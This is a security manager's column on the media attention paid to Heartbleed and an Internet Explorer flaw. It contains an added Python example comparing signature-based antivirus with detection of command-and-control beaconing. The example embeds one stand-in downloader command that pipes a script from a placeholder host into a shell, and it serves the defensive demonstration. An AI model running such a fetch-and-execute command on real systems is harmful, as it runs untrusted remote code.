Security Manager's Journal: With Heartbleed, suddenly the world is paying attention to security
Why have recent vulnerabilities gotten so much more attention than the ones that preceded them? It's hard to say, but the new awareness is a mixed blessing.
Suddenly I'm getting swamped with requests for information from people at work who never used to care about what I do. They are hearing about these vulnerabilities on the mainstream news, getting scared, and coming to me for advice. Is this good or bad?
Frankly, I don't understand why the mainstream media is picking on these particular vulnerabilities, when there are (and have been) so many others to choose from. It may be because of the buzz around the end of Windows XP security updates, and the news coverage of the security risks of unpatched vulnerabilities.
My first reaction to Heartbleed was, "Who cares?" Let's talk about some actual exploits, like the card number thefts at big retailers or the password thefts from AOL, LinkedIn, Facebook and Gmail. Those are a really big deal because they actually happened and caused great harm. Vulnerabilities? Sure, they are important, and professionals like me take them very seriously, but I don't see any reason why anybody else should be more concerned about them than any others. Vulnerabilities as a whole are bad, but the individual ones that are popping up in the news aren't something that should concern the average person. Exploits, yes; vulnerabilities, no.
My reaction to the recently announced Internet Explorer Flash vulnerability was similar. Why are we talking about this? The media is saying the vulnerability allows "remote command execution," which they say allows an attacker to completely take over a victim's computer. Yeah, so? We get a dozen of those announced every month from Microsoft and other platform vendors. Why is this one hitting the news?
I'm guessing here, but it may be the name. Heartbleed is a pretty cool moniker, isn't it? The average person who isn't into technology or security is going to perk up upon hearing that word. It invokes garish images, doesn't it? Maybe the first news reporter heard the name and thought it would get a lot of attention. He or she was right, if that's the case.
In any case, I've recently been finding myself walking through the door at work and answering throngs of concerned citizens wanting to know about these viruses. That's right, they think Heartbleed and the new Internet Explorer bug are viruses that are going to take over all the computers. I have to explain the difference between a vulnerability and an exploit, and I don't even want to get into all the varieties of actions that an exploit can take.
Talking, emailing and posting about these issues is starting to take up a lot of my time. That's good, and bad. On the positive side, I suddenly have a new opportunity to educate the general public about stuff that I care about (and they should care about), namely the cycle of software flaws that lead to discovered vulnerabilities and on to exploits, and the concept of "zero-day," which renders a lot of our defenses useless. It's also a good opportunity to explain how antivirus software works, what it protects against and its shortcomings (signature-based detection is only as good as the malware fingerprints within the antivirus database, and malware can do a lot of damage before a signature is deployed to detect it). I also like to take the opportunity to describe alternative malware detection and prevention technologies, such as behavior-based detection and command-and-control server callback detection. But when I get to that point, eyes start to glaze over and the listener starts looking at his watch. On the negative side, all this time spent discussing (and defanging) the news is biting into the time that I should be spending dealing with real security issues that affect my company.
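The contrast drawn above between signature-based antivirus and behavior-based detection is easy to show in code. The following Python script is an added example, not part of the original column: the "malware" sample, the signature database and the connection log are all constructed for illustration. A hash signature matches the exact sample it was built from and misses a variant that differs by a single byte, while a behavior-based check over outbound connections flags the periodic command-and-control callback ("beaconing") regardless of what the binary looks like.

```python
"""Signature-based vs. behavior-based detection, side by side (constructed example)."""
import hashlib
import statistics
from collections import defaultdict
from typing import Iterable, List, Optional, Tuple

# --- Constructed samples (harmless shell text standing in for malware) -------
KNOWN_SAMPLE = b"#!/bin/sh\ncurl -s http://beacon.example/cmd | sh\n"
# The same payload with one extra space: a trivial repack that changes the hash.
VARIANT = KNOWN_SAMPLE.replace(b"curl -s", b"curl  -s")

# --- Signature-based detection -------------------------------------------------
# Stand-in for a vendor's signature database: fingerprints of samples already seen.
SIGNATURE_DB = {
    hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Downloader.Constructed.A",
}


def signature_scan(blob: bytes) -> Optional[str]:
    """Return the signature name if this exact fingerprint is known, else None."""
    return SIGNATURE_DB.get(hashlib.sha256(blob).hexdigest())


# --- Behavior-based detection: command-and-control callback (beaconing) -------
Connection = Tuple[int, str, str]  # (epoch seconds, source host, destination host)


def detect_beacons(connections: Iterable[Connection],
                   min_hits: int = 4, max_jitter: float = 0.2) -> List[dict]:
    """Flag (src, dst) pairs that connect at a near-constant interval.

    Legitimate traffic to a destination tends to be bursty; implanted agents
    typically phone home on a timer. A low coefficient of variation of the
    inter-connection gaps (std dev / mean) is the beaconing heuristic used here.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in connections:
        by_pair[(src, dst)].append(ts)

    findings = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean_gap
        if jitter <= max_jitter:
            findings.append({
                "src": src, "dst": dst, "hits": len(times),
                "period": round(mean_gap, 1), "jitter": round(jitter, 3),
            })
    return findings


# Constructed connection log: "ws-17" beacons to beacon.example roughly every
# 300 s, and also browses cdn.example at irregular times.
CONSTRUCTED_LOG: List[Connection] = [
    (1000, "ws-17", "beacon.example"),
    (1302, "ws-17", "beacon.example"),
    (1598, "ws-17", "beacon.example"),
    (1901, "ws-17", "beacon.example"),
    (2199, "ws-17", "beacon.example"),
    (2502, "ws-17", "beacon.example"),
    (1010, "ws-17", "cdn.example"),
    (1025, "ws-17", "cdn.example"),
    (1700, "ws-17", "cdn.example"),
    (1712, "ws-17", "cdn.example"),
    (2400, "ws-17", "cdn.example"),
]

if __name__ == "__main__":
    print("known sample :", signature_scan(KNOWN_SAMPLE))   # matches
    print("one-byte variant:", signature_scan(VARIANT))     # None: signature missed it
    for f in detect_beacons(CONSTRUCTED_LOG):
        print("beacon:", f)                                  # only beacon.example is flagged
```

The one-byte variant is the point of the exercise: until a vendor has seen that exact file and shipped a new fingerprint, a purely signature-based scanner has nothing to match, which is the window in which a zero-day does its damage. The beacon check does not care about the file at all; it only needs the connection log, which is why it is a useful complement rather than a replacement.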
I guess I really shouldn't complain -- with security in the news, more people will become aware of what we security managers and practitioners do all day, and hopefully start to value it more. "Good thing we have these security professionals keeping us all safe," I imagine them saying. We're getting our 15 minutes of fame, and while I don't really understand why, I can't wait to see what's next.
This week's journal is written by a real security manager, "J.F. Rice," whose name and employer have been disguised for obvious reasons. Contact him at email@example.com.